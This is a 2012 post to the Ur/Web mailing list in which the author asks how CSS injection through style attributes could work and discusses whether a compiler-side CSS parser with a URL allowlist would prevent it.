[Ur] Supporting 'style' attribute securely
Marc Weber
marco-oweber at gmx.de
Sun Apr 15 13:36:07 EDT 2012
So what are people looking for?
For a CSS parser built into the urweb compiler which recognizes valid
links and checks them against a valid list of links which may be used
for CSS ? Then injection attacks would be impossible because
putting arbitrary CSS code from a database into style attributes would
be rejected because it can't be parsed at runtime?
Can somebody of you give some illustration about how such injection
attack with style attributes would look like?
If its only about protecting against putting arbitrary text from db into
style=".." attributes - then we have to worry whether we can trust the
programmer .. because he might add leaks in urweb language which you
can't prevent such as fun page_output_db () = dump_whole_db .. Thus
nobody is going to protect against mistakes done by programmers. To some
degree you have trust what they are doing.
Whatever you do I'd like to remind of the usability of SASS like
dialects for writing styles.
Oh last but not least: URLs in stiles (with hex something decoding) is
used to speed up loading of pages as well because no additional small
icons have to be fetched adding yet another round trip..
Marc Weber
More information about the Ur
mailing list